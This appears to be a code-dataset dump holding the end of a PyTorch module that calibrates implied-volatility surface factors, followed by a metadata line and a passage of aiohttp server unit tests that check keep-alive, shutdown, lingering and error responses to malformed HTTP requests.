trainingLoss[-1])\r\n self.saveModel(self.metaModelName + \"fe\")#save neural weights\r\n torch.save(self.code.state_dict(), self.metaModelName + \"code\") #save code\r\n #y_vec[-1] = trainingLoss[-1]\r\n #line1 = live_plotter(x_vec, y_vec, line1)\r\n #y_vec = np.append(y_vec[1:], 0.0)\r\n \r\n \r\n \r\n return np.array(trainingLoss)\r\n \r\n def serializeObject(self, object, fileName):\r\n #Delete former file version\r\n #for f in glob.glob(fileName + \"*\"):\r\n # os.remove(f)\r\n \r\n with open(fileName, \"wb\") as f :\r\n pickle.dump(object, f, protocol=3)\r\n \r\n return\r\n \r\n def readObject(self, fileName):\r\n with open(fileName, \"rb\") as f :\r\n object = pickle.load(f)\r\n \r\n return object\r\n \r\n #save metamodel (graph and variable values)\r\n def saveModel(self, pathFile): \r\n #Delete former file version\r\n for f in glob.glob(pathFile + \"*\"):\r\n os.remove(f)\r\n torch.save(self.fe.state_dict(), pathFile) #save neural weights\r\n \r\n scalingValue = [self.MeanFwd, self.StdFwd, self.MeanLogMaturity, self.StdLogMaturity, self.MeanLogMoneyness, self.StdLogMoneyness]\r\n self.serializeObject(scalingValue, pathFile + \"scale\")\r\n return None\r\n \r\n \r\n def restoreWeights(self, fileName = None):\r\n #Restore graph of operations\r\n self.fe.load_state_dict(torch.load((self.metaModelName + \"fe\") if fileName is None else fileName))\r\n scalingValue = self.readObject(((self.metaModelName + \"fe\") if fileName is None else fileName) + \"scale\")\r\n \r\n self.MeanFwd = scalingValue[0]\r\n self.StdFwd = scalingValue[1]\r\n self.MeanLogMaturity = scalingValue[2]\r\n self.StdLogMaturity = scalingValue[3]\r\n self.MeanLogMoneyness = scalingValue[4]\r\n self.StdLogMoneyness = scalingValue[5]\r\n return\r\n \r\n def restoringGraph(self):\r\n #Restore graph of operations\r\n self.fe = None\r\n self.code = None\r\n \r\n self.buildModel()\r\n return\r\n \r\n #######################################################################################################\r\n 
#Evaluation functions\r\n #######################################################################################################\r\n \r\n #Same but with default session \r\n def evalModel(self, inputTest):\r\n bestLoss, reconstructedSurface, encodings, _ = self.calibratedFactors(inputTest)\r\n return bestLoss, reconstructedSurface, encodings\r\n \r\n \r\n def castToDataFrame(self, x):\r\n if type(x)==type(pd.Series()):\r\n return pd.DataFrame(x.values, index = x.index, columns = [x.name])\r\n return x\r\n \r\n def getLogMoneyness(self, batch):\r\n return batch[1].applymap(lambda x : (x[1])) if type(batch[1])==type(pd.DataFrame()) else batch[1].map(lambda x : (x[1]))\r\n \r\n def getLogMaturities(self, batch):\r\n return batch[1].applymap(lambda x : np.log(x[0])) if type(batch[1])==type(pd.DataFrame()) else batch[1].map(lambda x : np.log(x[0]))\r\n \r\n def evalBatch(self, batch, code):\r\n \r\n batchLogMoneyness = self.getLogMoneyness(batch)\r\n scaledMoneyness = (batchLogMoneyness.values - self.MeanLogMoneyness) / self.StdLogMoneyness\r\n logMoneynessTensor = torch.Tensor(np.expand_dims(scaledMoneyness, 1)).float() #Log moneyness\r\n \r\n # for j in np.random.choice(len(test[k]), 10):\r\n # filt = test[k].nBizDays >= 10\r\n batchLogMat = self.getLogMaturities(batch)\r\n scaledMat = (batchLogMat.values - self.MeanLogMaturity) / self.StdLogMaturity\r\n logMaturity = torch.tensor( np.expand_dims(scaledMat, 1) , requires_grad=True).float() \r\n \r\n codeTensor = code.repeat(batch[0].shape[0], 1).float()\r\n refVol = torch.tensor(batch[0].values)\r\n \r\n inputTensor = torch.cat((logMoneynessTensor, logMaturity, codeTensor), dim=1)\r\n outputTensor = self.fe( inputTensor )[:, 0]\r\n \r\n loss = torch.mean( (outputTensor - refVol)[~torch.isnan(outputTensor)] ** 2 )#torch.nanmean( (outputTensor - refVol) ** 2 ) \r\n return inputTensor, outputTensor, loss, logMaturity, codeTensor, logMoneynessTensor\r\n \r\n def getArbitrageTheta(self, dataSetList, initialFactorValue):\r\n \r\n sparseSurface = dataSetList[0]\r\n #Build tensor for reconstruction\r\n def reshapeDataset(df):\r\n return pd.DataFrame(np.reshape([df.values], (1,df.shape[0])), \r\n columns = df.index)\r\n reshapedDatasetList = [reshapeDataset(x) if x is not None else x for x in dataSetList]\r\n \r\n reshapedFactorValue = pd.DataFrame(np.reshape([initialFactorValue], (1,initialFactorValue.shape[0])))\r\n \r\n self.restoringGraph()\r\n \r\n nbDays = reshapedDatasetList[0].shape[0]\r\n nbFactors = reshapedDatasetList[0].shape[1]\r\n self.code = Code(nbDays, self.nbFactors, initialValue = reshapedFactorValue.values) #Latent variables\r\n self.optimizer_code = torch.optim.Adam(self.code.parameters(), lr=1e-2) #Optimizer for code\r\n \r\n self.restoreWeights()\r\n \r\n volPred = []\r\n for d in np.arange(nbDays) : \r\n batchOriginal = [(elt.iloc[d] if elt is not None else None) for elt in reshapedDatasetList]\r\n #get valid coordinates\r\n filteredBatch, filteredBatchCoordinates = loadData.removePointsWithInvalidCoordinates(batchOriginal[0],\r\n batchOriginal[1])\r\n keptCols = filteredBatch.index #batch[0].dropna(axis = 1, how=\"all\").columns\r\n batch = [(elt[keptCols] if elt is not None else None) for elt in batchOriginal ]\r\n \r\n #gradSeries = pd.Series(np.zeros_like(batch.values), index = batch.index)\r\n #for idx in gradSeries.index : \r\n tensorList = self.evalBatch(batch, self.code.code[d, :])\r\n outputTensor = tensorList[1]\r\n logMaturity = tensorList[3]\r\n logMaturity.retain_grad()\r\n \r\n maturityTensor = 
torch.exp(logMaturity).view(-1)\r\n impliedTotalVariance = torch.square(outputTensor) * maturityTensor\r\n self.fe.zero_grad()\r\n impliedTotalVariance.backward( torch.ones_like(outputTensor).float() )\r\n gradSeries = pd.Series((logMaturity.grad.view(-1) / maturityTensor.view(-1)).detach().numpy().reshape(batch[0].shape), index = batch[0].index)\r\n print(gradSeries)\r\n \r\n #indexZero = torch.Tensor(0).to(dtype=torch.long)\r\n #for i, (logMat, output) in enumerate(zip(logMaturity[:,0] ,outputTensor)) : #range(impliedTotalVariance.size(0)):\r\n # print((logMat, output))\r\n # maturityTensor = torch.exp(logMat)\r\n # impliedTotalVariance = torch.square(output) * maturityTensor\r\n # \r\n # gradTheta = torch.autograd.grad(impliedTotalVariance, logMat,\r\n # retain_graph=True, allow_unused=True, create_graph=True) / maturityTensor)\r\n # gradList.append(gradTheta.item())\r\n \r\n #for i in range(batch[0].shape[0]):\r\n # gradTheta[i, 0] = torch.autograd.grad(impliedTotalVariance[i], \r\n # [logMaturity[i,0]], \r\n # retain_graph=True, allow_unused=True, create_graph=True) / torch.exp(logMaturity[i,0])\r\n \r\n gradSeries = gradSeries.append(batchOriginal[0].drop(keptCols))[batchOriginal[0].index]\r\n volPred.append(gradSeries)\r\n \r\n volDf = pd.concat(volPred, axis = 1).transpose()\r\n reshapedReconstruction = pd.DataFrame(volDf.values, \r\n index = reshapedDatasetList[0].index, \r\n columns = reshapedDatasetList[0].columns)\r\n \r\n return reshapedReconstruction#.rename(sparseSurface.name)\r\n \r\n def calibratedFactors(self, dataSetList, initialFactorValue = None):\r\n #input, output = self.getLocationFromDatasetList(dataSetList)\r\n \r\n self.restoringGraph()\r\n \r\n nbDays = dataSetList[0].shape[0]\r\n self.code = Code(nbDays, self.nbFactors, initialValue = None if initialFactorValue is None else initialFactorValue.values) #Latent variables\r\n self.optimizer_code = torch.optim.Adam(self.code.parameters(), lr=1e-2) #Optimizer for code\r\n \r\n \r\n self.restoreWeights()\r\n \r\n def getLogMaturities(batch):\r\n return batch[1].applymap(lambda x : np.log(x[0]))\r\n \r\n nbCalibrationStep = 1000 if (\"nbCalibrationStep\" not in self.hyperParameters) else self.hyperParameters[\"nbCalibrationStep\"]\r\n calibrationLosses = []\r\n for __ in range(nbCalibrationStep):#range(100000): #Number of epochs\r\n res_ = []\r\n \r\n miniBatchIndex = np.random.choice(nbDays, 200) if (200 <= nbDays) else np.arange(nbDays)\r\n for k in miniBatchIndex : #random mini-batch\r\n batch = [(elt.iloc[k] if elt is not None else None) for elt in dataSetList]\r\n keptCols = batch[0].dropna().index #batch[0].dropna(axis = 1, how=\"all\").columns\r\n batch = [(elt[keptCols] if elt is not None else None) for elt in batch ]\r\n \r\n tensorList = self.evalBatch(batch, self.code.code[k, :])\r\n \r\n res_.append( tensorList[2] ) #mean of squared errors for each observation\r\n res = torch.mean(torch.stack(res_)) #Mean along mini-batches : training loss\r\n \r\n # res += torch.mean(torch.mean(code.code))**2 + (torch.mean(torch.mean(code.code**2)-1))**2\r\n self.optimizer_code.zero_grad() #set gradient to zero\r\n res.backward() #compute loss gradient wrt neural weights\r\n self.optimizer_code.step() #update neural weights and go to next iteration\r\n \r\n calibrationLosses.append(np.sqrt(res.item()))\r\n if self.verbose :\r\n print(__, calibrationLosses[-1]) #print RMSE\r\n \r\n if calibrationLosses[-1]<=min(calibrationLosses) :\r\n if self.verbose : \r\n print(\"New minimal error\", calibrationLosses[-1]) #print 
RMSE\r\n torch.save(self.code.state_dict(), self.metaModelName + \"code\" + \"Tmp\") #save code\r\n \r\n volPred = []\r\n self.code.load_state_dict(torch.load(self.metaModelName + \"code\" + \"Tmp\"))\r\n for d in np.arange(nbDays) : \r\n batchOriginal = [(elt.iloc[d] if elt is not None else None) for elt in dataSetList]\r\n #get valid coordinates\r\n filteredBatch, filteredBatchCoordinates = loadData.removePointsWithInvalidCoordinates(batchOriginal[0],\r\n batchOriginal[1])\r\n keptCols = filteredBatch.index #batch[0].dropna(axis = 1, how=\"all\").columns\r\n batch = [(elt[keptCols] if elt is not None else None) for elt in batchOriginal ]\r\n \r\n tensorList = self.evalBatch(batch, self.code.code[d, :])\r\n predSeries = pd.Series(tensorList[1].detach().numpy().reshape(batch[0].shape), index = keptCols)\r\n predSeries = predSeries.append(batchOriginal[0].drop(keptCols))[batchOriginal[0].index]\r\n volPred.append(predSeries)\r\n \r\n volDf = pd.concat(volPred, axis = 1).transpose()\r\n reshapedReconstruction = pd.DataFrame(volDf.values, \r\n index = dataSetList[0].index, \r\n columns = dataSetList[0].columns)\r\n calibratedFactors = np.reshape(self.code.code.data.cpu().numpy(), (nbDays, self.nbFactors))\r\n bestCalibration = -1\r\n \r\n if self.verbose :\r\n print(\"Average Loss : \", calibrationLosses[bestCalibration])\r\n \r\n return calibrationLosses[bestCalibration], reshapedReconstruction, pd.DataFrame(calibratedFactors, index = dataSetList[0].index), calibrationLosses\r\n \r\n def completeDataTensor(self, \r\n sparseSurfaceList, \r\n initialValueForFactors, \r\n nbCalibrationStep, \r\n *args):\r\n \r\n \r\n #Rebuild tensor graph\r\n self.restoringGraph()\r\n \r\n sparseSurface = sparseSurfaceList[0]\r\n #Build tensor for reconstruction\r\n def reshapeDataset(df):\r\n return pd.DataFrame(np.reshape([df.values], (1,df.shape[0])), \r\n columns = df.index)\r\n reshapedDatasetList = [reshapeDataset(x) if x is not None else x for x in sparseSurfaceList]\r\n \r\n reshapedValueForFactors = pd.DataFrame(np.reshape([initialValueForFactors],\r\n (1,initialValueForFactors.shape[0])))\r\n \r\n tmp = self.calibratedFactors(reshapedDatasetList, initialFactorValue = reshapedValueForFactors)\r\n return tmp[0], np.ravel(tmp[2].values), tmp[1].iloc[0].rename(sparseSurface.name), pd.Series(tmp[3])\r\n \r\n \r\n def commonEvalSingleDayWithoutCalibration(self, \r\n initialValueForFactors,\r\n dataSetList,\r\n computeSensi = False):\r\n \r\n #Rebuild tensor graph and reload the trained weights (and scaling constants) before any forward pass\r\n self.restoringGraph()\r\n self.restoreWeights()\r\n #Build tensor for reconstruction\r\n nbObs = 1 if initialValueForFactors.ndim == 1 else initialValueForFactors.shape[0]\r\n nbPoints = dataSetList[1].shape[0] if dataSetList[1].ndim == 1 else dataSetList[1].shape[1]\r\n nbFactors = self.nbFactors \r\n \r\n reshapedValueForFactors = np.reshape([initialValueForFactors],\r\n (nbObs,nbFactors))\r\n \r\n \r\n self.code = Code(nbObs, self.nbFactors, initialValue = reshapedValueForFactors) #Latent variables\r\n codeTensor = self.code.code[0, :].repeat(nbPoints, 1) #single-day evaluation : use the first (and only) code row\r\n \r\n batchLogMat = self.getLogMaturities(dataSetList)\r\n scaledMat = (batchLogMat.values - self.MeanLogMaturity) / self.StdLogMaturity\r\n logMaturity = torch.tensor( np.expand_dims(scaledMat, 1) ).float() \r\n \r\n batchLogMoneyness = self.getLogMoneyness(dataSetList)\r\n scaledMoneyness = (batchLogMoneyness.values - self.MeanLogMoneyness) / self.StdLogMoneyness\r\n logMoneynessTensor = torch.Tensor(np.expand_dims(scaledMoneyness, 1)).float() #Log moneyness\r\n \r\n \r\n inputTensor = torch.cat((logMoneynessTensor, logMaturity, codeTensor), dim=1)\r\n outputTensor = self.fe( inputTensor )[:, 0]\r\n \r\n #Build tensor for reconstruction\r\n # print(\"nbPoints : \", nbPoints)\r\n # print(\"initialValueForFactors : \", initialValueForFactors)\r\n # print(\"inputFeatures : \", inputFeatures)\r\n # print(\"outputFeatures : \", outputFeatures)\r\n # print(\"outputTensor : \", self.outputTensor)\r\n \r\n reconstructedSurface = outputTensor.detach().numpy() #flat predictions, reshaped according to ndim below\r\n \r\n #if computeSensi :\r\n # inputTensor.requires_grad = True\r\n \r\n \r\n reshapedJacobian = None\r\n if computeSensi :\r\n reshapedJacobian = np.ones((nbObs, nbPoints, nbFactors)) if initialValueForFactors.ndim != 1 else np.ones((nbPoints, nbFactors))\r\n #for p in range(nbPoints) :\r\n # output.backward()\r\n # jacobian = input.grad.data\r\n # reshapedJacobian = tf.reshape(jacobian, shape = [nbObs, nbPoints, nbFactors])\r\n # if self.verbose :\r\n # print(reshapedJacobian)\r\n \r\n \r\n calibratedSurfaces = outputTensor\r\n factorSensi = None\r\n \r\n if initialValueForFactors.ndim == 1 :\r\n calibratedSurfaces = np.reshape(reconstructedSurface, (nbPoints))\r\n if reshapedJacobian is not None :\r\n factorSensi = np.reshape(reshapedJacobian, (nbPoints, nbFactors))\r\n elif initialValueForFactors.ndim == 2 :\r\n calibratedSurfaces = np.reshape(reconstructedSurface, (nbObs,nbPoints))\r\n if reshapedJacobian is not None :\r\n factorSensi = np.reshape(reshapedJacobian, (nbObs, nbPoints, nbFactors))\r\n \r\n \r\n return calibratedSurfaces, factorSensi \r\n \r\n \r\n \r\n def evalSingleDayWithoutCalibrationWithSensi(self, initialValueForFactors, dataSetList):\r\n return self.commonEvalSingleDayWithoutCalibration(initialValueForFactors, \r\n dataSetList,\r\n computeSensi = True)\r\n \r\n \r\n def evalSingleDayWithoutCalibration(self, initialValueForFactors, dataSetList):\r\n s,_ = self.commonEvalSingleDayWithoutCalibration(initialValueForFactors, dataSetList)\r\n return s\r\n \r\n #Take a full surface in entry, reconstruct it \r\n #and return sensitivities between points i.e. 
the jacobian of D(E(S)) w.r.t S\r\n def evalInterdependancy(self, fullSurfaceList):\r\n raise NotImplementedError(\"Implicit encoder model\")\r\n \r\n \r\n \r\n #Return None if not supported\r\n def getDecoderCoefficients(self):\r\n raise NotImplementedError(\"Abstract Class !\")\r\n\r\n","repo_name":"mChataign/smileCompletion","sub_path":"Code/pytorchModel.py","file_name":"pytorchModel.py","file_ext":"py","file_size_in_byte":28386,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"21"} +{"seq_id":"9771710534","text":"\"\"\"Tests for aiohttp/server.py\"\"\"\n\nimport asyncio\nimport socket\nfrom functools import partial\nfrom html import escape\nfrom unittest import mock\n\nimport pytest\n\nfrom aiohttp import errors, helpers, server\n\n\n@pytest.yield_fixture\ndef make_srv(loop):\n srv = None\n\n def maker(cls=server.ServerHttpProtocol, **kwargs):\n nonlocal srv\n srv = 
cls(loop=loop, access_log=None, **kwargs)\n return srv\n\n yield maker\n if srv is not None:\n srv.connection_lost(None)\n\n\n@pytest.fixture\ndef srv(make_srv):\n return make_srv()\n\n\ndef test_http_error_exception():\n exc = errors.HttpProcessingError(code=500, message='Internal error')\n assert exc.code == 500\n assert exc.message == 'Internal error'\n\n\ndef test_handle_request(srv):\n transport = mock.Mock()\n\n srv.connection_made(transport)\n srv.writer = mock.Mock()\n\n message = mock.Mock()\n message.headers = []\n message.version = (1, 1)\n srv.handle_request(message, mock.Mock())\n\n content = b''.join(\n [c[1][0] for c in list(srv.writer.write.mock_calls)])\n assert content.startswith(b'HTTP/1.1 404 Not Found\\r\\n')\n\n\n@asyncio.coroutine\ndef test_shutdown(srv, loop):\n transport = mock.Mock()\n transport.close.side_effect = partial(srv.connection_lost, None)\n transport.drain.side_effect = []\n srv.connection_made(transport)\n assert transport is srv.transport\n\n yield from asyncio.sleep(0, loop=loop)\n\n srv.reader.feed_data(\n b'GET / HTTP/1.1\\r\\n'\n b'Host: example.com\\r\\n'\n b'Content-Length: 0\\r\\n\\r\\n')\n\n srv._keepalive = True\n\n request_handler = srv._request_handler\n\n t0 = loop.time()\n yield from srv.shutdown()\n t1 = loop.time()\n\n assert t1 - t0 < 0.05, t1-t0\n\n assert transport.close.called\n assert srv.transport is None\n\n assert srv._request_handler is None\n assert request_handler.done()\n\n\n@asyncio.coroutine\ndef test_double_shutdown(srv):\n transport = srv.transport = mock.Mock()\n transport.close.side_effect = partial(srv.connection_lost, None)\n srv.connection_made(transport)\n srv.writer = mock.Mock()\n\n yield from srv.shutdown()\n assert transport.close.called\n assert srv.transport is None\n\n transport.reset_mock()\n yield from srv.shutdown()\n assert not transport.close.called\n assert srv.transport is None\n\n\ndef test_connection_made(srv):\n assert srv._request_handler is None\n\n srv.connection_made(mock.Mock())\n assert srv._request_handler is not None\n assert not srv._closing\n\n\ndef test_connection_made_with_keepaplive(srv):\n sock = mock.Mock()\n transport = mock.Mock()\n transport.get_extra_info.return_value = sock\n srv.connection_made(transport)\n sock.setsockopt.assert_called_with(socket.SOL_SOCKET,\n socket.SO_KEEPALIVE, 1)\n\n\ndef test_connection_made_without_keepaplive(make_srv):\n srv = make_srv(tcp_keepalive=False)\n\n sock = mock.Mock()\n transport = mock.Mock()\n transport.get_extra_info.return_value = sock\n srv.connection_made(transport)\n assert not sock.setsockopt.called\n\n\ndef test_data_received(srv):\n srv.connection_made(mock.Mock())\n\n srv.data_received(b'123')\n assert b'123' == bytes(srv.reader._buffer)\n\n srv.data_received(b'456')\n assert b'123456' == bytes(srv.reader._buffer)\n\n\ndef test_eof_received(srv):\n srv.connection_made(mock.Mock())\n srv.eof_received()\n assert srv.reader._eof\n\n\n@asyncio.coroutine\ndef test_connection_lost(srv, loop):\n srv.connection_made(mock.Mock())\n\n handle = srv._request_handler\n yield from asyncio.sleep(0, loop=loop) # wait for .start() starting\n srv.connection_lost(None)\n\n assert srv._closing\n\n yield from handle\n\n assert srv._request_handler is None\n\n\ndef test_srv_keep_alive(srv):\n assert not srv._keepalive\n\n srv.keep_alive(True)\n assert srv._keepalive\n\n srv.keep_alive(False)\n assert not srv._keepalive\n\n\ndef test_slow_request(make_srv, loop):\n transport = mock.Mock()\n srv = make_srv(slow_request_timeout=0.01, 
keepalive_timeout=0)\n srv.connection_made(transport)\n\n srv.reader.feed_data(\n b'GET / HTTP/1.0\\r\\n'\n b'Host: example.com\\r\\n')\n\n loop.run_until_complete(srv._request_handler)\n assert transport.close.called\n\n\ndef test_bad_method(srv, loop):\n transport = mock.Mock()\n srv.connection_made(transport)\n\n srv.reader.feed_data(\n b'!@#$ / HTTP/1.0\\r\\n'\n b'Host: example.com\\r\\n\\r\\n')\n\n loop.run_until_complete(srv._request_handler)\n assert transport.write.mock_calls[0][1][0].startswith(\n b'HTTP/1.1 400 Bad Request\\r\\n')\n\n\ndef test_line_too_long(srv, loop):\n transport = mock.Mock()\n srv.connection_made(transport)\n srv.data_received(b''.join([b'a' for _ in range(10000)]) + b'\\r\\n\\r\\n')\n\n loop.run_until_complete(srv._request_handler)\n assert transport.write.mock_calls[0][1][0].startswith(\n b'HTTP/1.1 400 Bad Request\\r\\n')\n\n\ndef test_invalid_content_length(srv, loop):\n transport = mock.Mock()\n srv.connection_made(transport)\n\n srv.reader.feed_data(\n b'GET / HTTP/1.0\\r\\n'\n b'Host: example.com\\r\\n'\n b'Content-Length: sdgg\\r\\n\\r\\n')\n\n loop.run_until_complete(srv._request_handler)\n assert transport.write.mock_calls[0][1][0].startswith(\n b'HTTP/1.1 400 Bad Request\\r\\n')\n\n\ndef test_handle_error(srv):\n transport = mock.Mock()\n srv.connection_made(transport)\n srv.keep_alive(True)\n srv.writer = mock.Mock()\n\n srv.handle_error(404, headers=(('X-Server', 'asyncio'),))\n content = b''.join(\n [c[1][0] for c in list(srv.writer.write.mock_calls)])\n assert b'HTTP/1.1 404 Not Found' in content\n assert b'X-Server: asyncio' in content\n assert not srv._keepalive\n\n\ndef test_handle_error__utf(make_srv):\n transport = mock.Mock()\n srv = make_srv(debug=True)\n srv.connection_made(transport)\n srv.keep_alive(True)\n srv.writer = mock.Mock()\n srv.logger = mock.Mock()\n\n try:\n raise RuntimeError('что-то пошло не так')\n except RuntimeError as exc:\n srv.handle_error(exc=exc)\n content = b''.join(\n [c[1][0] for c in list(srv.writer.write.mock_calls)])\n assert b'HTTP/1.1 500 Internal Server Error' in content\n assert b'Content-Type: text/html; charset=utf-8' in content\n pattern = escape(\"raise RuntimeError('что-то пошло не так')\")\n assert pattern.encode('utf-8') in content\n assert not srv._keepalive\n\n srv.logger.exception.assert_called_with(\"Error handling request\")\n\n\ndef test_handle_error_traceback_exc(make_srv):\n log = mock.Mock()\n srv = make_srv(debug=True, logger=log)\n srv.transport = mock.Mock()\n srv.transport.get_extra_info.return_value = '127.0.0.1'\n srv.writer = mock.Mock()\n srv._request_handler = mock.Mock()\n\n with mock.patch('aiohttp.server.traceback') as m_trace:\n m_trace.format_exc.side_effect = ValueError\n\n srv.handle_error(500, exc=object())\n\n content = b''.join(\n [c[1][0] for c in list(srv.writer.write.mock_calls)])\n assert content.startswith(b'HTTP/1.1 500 Internal Server Error')\n assert log.exception.called\n\n\ndef test_handle_error_debug(srv):\n transport = mock.Mock()\n srv.debug = True\n srv.connection_made(transport)\n srv.writer = mock.Mock()\n\n try:\n raise ValueError()\n except Exception as exc:\n srv.handle_error(999, exc=exc)\n\n content = b''.join(\n [c[1][0] for c in list(srv.writer.write.mock_calls)])\n\n assert b'HTTP/1.1 500 Internal' in content\n assert b'Traceback (most recent call last):' in content\n\n\ndef test_handle_error_500(make_srv, loop):\n log = mock.Mock()\n transport = mock.Mock()\n transport.drain.return_value = ()\n\n srv = make_srv(logger=log)\n 
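# drain() was stubbed to a no-op above, so handle_error can flush the 500 response without a real transport\n 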
srv.connection_made(transport)\n srv.writer = mock.Mock()\n\n srv.handle_error(500)\n assert log.exception.called\n\n\ndef test_handle(srv, loop):\n\n def get_mock_coro(return_value):\n @asyncio.coroutine\n def mock_coro(*args, **kwargs):\n return return_value\n return mock.Mock(wraps=mock_coro)\n\n transport = mock.Mock()\n srv.connection_made(transport)\n\n handle = srv.handle_request = get_mock_coro(return_value=None)\n\n srv.reader.feed_data(\n b'GET / HTTP/1.0\\r\\n'\n b'Host: example.com\\r\\n\\r\\n')\n\n loop.run_until_complete(srv._request_handler)\n assert handle.called\n assert transport.close.called\n\n\ndef test_handle_uncompleted(make_srv, loop):\n transport = mock.Mock()\n closed = False\n\n def close():\n nonlocal closed\n closed = True\n\n transport.close = close\n\n srv = make_srv(lingering_timeout=0)\n\n srv.connection_made(transport)\n srv.logger.exception = mock.Mock()\n\n handle = srv.handle_request = mock.Mock()\n handle.side_effect = ValueError\n\n srv.reader.feed_data(\n b'GET / HTTP/1.0\\r\\n'\n b'Host: example.com\\r\\n'\n b'Content-Length: 50000\\r\\n\\r\\n')\n\n loop.run_until_complete(srv._request_handler)\n assert handle.called\n assert closed\n srv.logger.exception.assert_called_with(\"Error handling request\")\n\n\n@asyncio.coroutine\ndef test_lingering(srv, loop):\n\n transport = mock.Mock()\n srv.connection_made(transport)\n\n yield from asyncio.sleep(0, loop=loop)\n assert not transport.close.called\n\n srv.reader.feed_data(\n b'GET / HTTP/1.0\\r\\n'\n b'Host: example.com\\r\\n'\n b'Content-Length: 3\\r\\n\\r\\n')\n\n yield from asyncio.sleep(0.1, loop=loop)\n assert not transport.close.called\n\n srv.reader.feed_data(b'123')\n srv.reader.feed_eof()\n\n yield from asyncio.sleep(0, loop=loop)\n transport.close.assert_called_with()\n\n\n@asyncio.coroutine\ndef test_lingering_disabled(make_srv, loop):\n\n class Server(server.ServerHttpProtocol):\n\n def handle_request(self, message, payload):\n yield from payload.read()\n return super().handle_request(message, payload)\n\n srv = make_srv(Server, lingering_time=0)\n\n transport = mock.Mock()\n srv.connection_made(transport)\n\n yield from asyncio.sleep(0, loop=loop)\n assert not transport.close.called\n\n srv.reader.feed_data(\n b'GET / HTTP/1.0\\r\\n'\n b'Host: example.com\\r\\n'\n b'Content-Length: 50\\r\\n\\r\\n')\n\n srv.reader.feed_data(b'123')\n\n yield from asyncio.sleep(0, loop=loop)\n assert not transport.close.called\n srv.reader.feed_eof()\n yield from asyncio.sleep(0, loop=loop)\n transport.close.assert_called_with()\n\n\n@asyncio.coroutine\ndef test_lingering_zero_timeout(make_srv, loop):\n\n class Server(server.ServerHttpProtocol):\n\n def handle_request(self, message, payload):\n yield from payload.read()\n return super().handle_request(message, payload)\n\n srv = make_srv(Server, lingering_time=1e-30)\n\n transport = mock.Mock()\n srv.connection_made(transport)\n\n yield from asyncio.sleep(0, loop=loop)\n assert not transport.close.called\n\n srv.reader.feed_data(\n b'GET / HTTP/1.0\\r\\n'\n b'Host: example.com\\r\\n'\n b'Content-Length: 50\\r\\n\\r\\n')\n\n srv.reader.feed_data(b'123')\n\n yield from asyncio.sleep(0, loop=loop)\n assert not transport.close.called\n srv.reader.feed_eof()\n\n yield from asyncio.sleep(0, loop=loop)\n transport.close.assert_called_with()\n\n\ndef test_handle_coro(srv, loop):\n transport = mock.Mock()\n\n called = False\n\n @asyncio.coroutine\n def coro(message, payload):\n nonlocal called\n called = True\n srv.eof_received()\n\n srv.handle_request = coro\n 
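# install the coroutine handler before the connection starts, so the request loop picks it up\n 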
srv.connection_made(transport)\n\n srv.reader.feed_data(\n b'GET / HTTP/1.0\\r\\n'\n b'Host: example.com\\r\\n\\r\\n')\n loop.run_until_complete(srv._request_handler)\n assert called\n\n\ndef test_handle_cancel(make_srv, loop):\n log = mock.Mock()\n transport = mock.Mock()\n\n srv = make_srv(logger=log, debug=True)\n srv.connection_made(transport)\n srv.writer = mock.Mock()\n srv.handle_request = mock.Mock()\n\n @asyncio.coroutine\n def cancel():\n srv._request_handler.cancel()\n\n loop.run_until_complete(\n asyncio.gather(srv._request_handler, cancel(), loop=loop))\n assert log.debug.called\n\n\ndef test_handle_cancelled(make_srv, loop):\n log = mock.Mock()\n transport = mock.Mock()\n\n srv = make_srv(logger=log, debug=True)\n srv.connection_made(transport)\n\n srv.handle_request = mock.Mock()\n # start request_handler task\n loop.run_until_complete(asyncio.sleep(0, loop=loop))\n\n srv.reader.feed_data(\n b'GET / HTTP/1.0\\r\\n'\n b'Host: example.com\\r\\n\\r\\n')\n\n r_handler = srv._request_handler\n srv._request_handler = None # emulate srv.connection_lost()\n\n assert loop.run_until_complete(r_handler) is None\n\n\ndef test_handle_400(srv, loop):\n transport = mock.Mock()\n transport.drain.side_effect = []\n srv.connection_made(transport)\n srv.reader.feed_data(b'GET / HT/asd\\r\\n\\r\\n')\n\n loop.run_until_complete(srv._request_handler)\n\n assert b'400 Bad Request' in srv.transport.write.call_args[0][0]\n\n\ndef test_handle_500(srv, loop):\n transport = mock.Mock()\n transport.drain.side_effect = []\n srv.connection_made(transport)\n\n handle = srv.handle_request = mock.Mock()\n handle.side_effect = ValueError\n\n srv.reader.feed_data(\n b'GET / HTTP/1.0\\r\\n'\n b'Host: example.com\\r\\n\\r\\n')\n loop.run_until_complete(srv._request_handler)\n\n assert b'500 Internal Server Error' in srv.transport.write.call_args[0][0]\n\n\ndef test_handle_error_no_handle_task(srv):\n transport = mock.Mock()\n srv.keep_alive(True)\n srv.connection_made(transport)\n srv.connection_lost(None)\n\n srv.handle_error(300)\n assert not srv._keepalive\n\n\ndef test_keep_alive(make_srv, loop):\n srv = make_srv(keep_alive=0.1)\n transport = mock.Mock()\n closed = False\n\n def close():\n nonlocal closed\n closed = True\n srv.connection_lost(None)\n loop.stop()\n\n transport.close = close\n\n srv.connection_made(transport)\n\n handle = srv.handle_request = mock.Mock()\n\n srv.reader.feed_data(\n b'GET / HTTP/1.1\\r\\n'\n b'CONNECTION: keep-alive\\r\\n'\n b'HOST: example.com\\r\\n\\r\\n')\n\n loop.run_forever()\n assert handle.called\n assert closed\n\n\ndef test_keep_alive_close_existing(make_srv, loop):\n transport = mock.Mock()\n srv = make_srv(keepalive_timeout=15)\n srv.connection_made(transport)\n\n srv.handle_request = mock.Mock()\n srv.handle_request.return_value = helpers.create_future(loop)\n srv.handle_request.return_value.set_result(1)\n\n srv.data_received(\n b'GET / HTTP/1.0\\r\\n'\n b'HOST: example.com\\r\\n\\r\\n')\n\n loop.run_until_complete(srv._request_handler)\n assert transport.close.called\n\n\ndef test_srv_process_request_without_timeout(make_srv, loop):\n transport = mock.Mock()\n srv = make_srv(timeout=0)\n srv.connection_made(transport)\n\n srv.reader.feed_data(\n b'GET / HTTP/1.0\\r\\n'\n b'Host: example.com\\r\\n\\r\\n')\n\n loop.run_until_complete(srv._request_handler)\n assert transport.close.called\n\n\ndef test_keep_alive_timeout_default(srv):\n assert 75 == srv.keepalive_timeout\n\n\ndef test_keep_alive_timeout_nondefault(make_srv):\n srv = make_srv(keepalive_timeout=10)\n 
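# the constructor argument should round-trip through the keepalive_timeout property\n 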
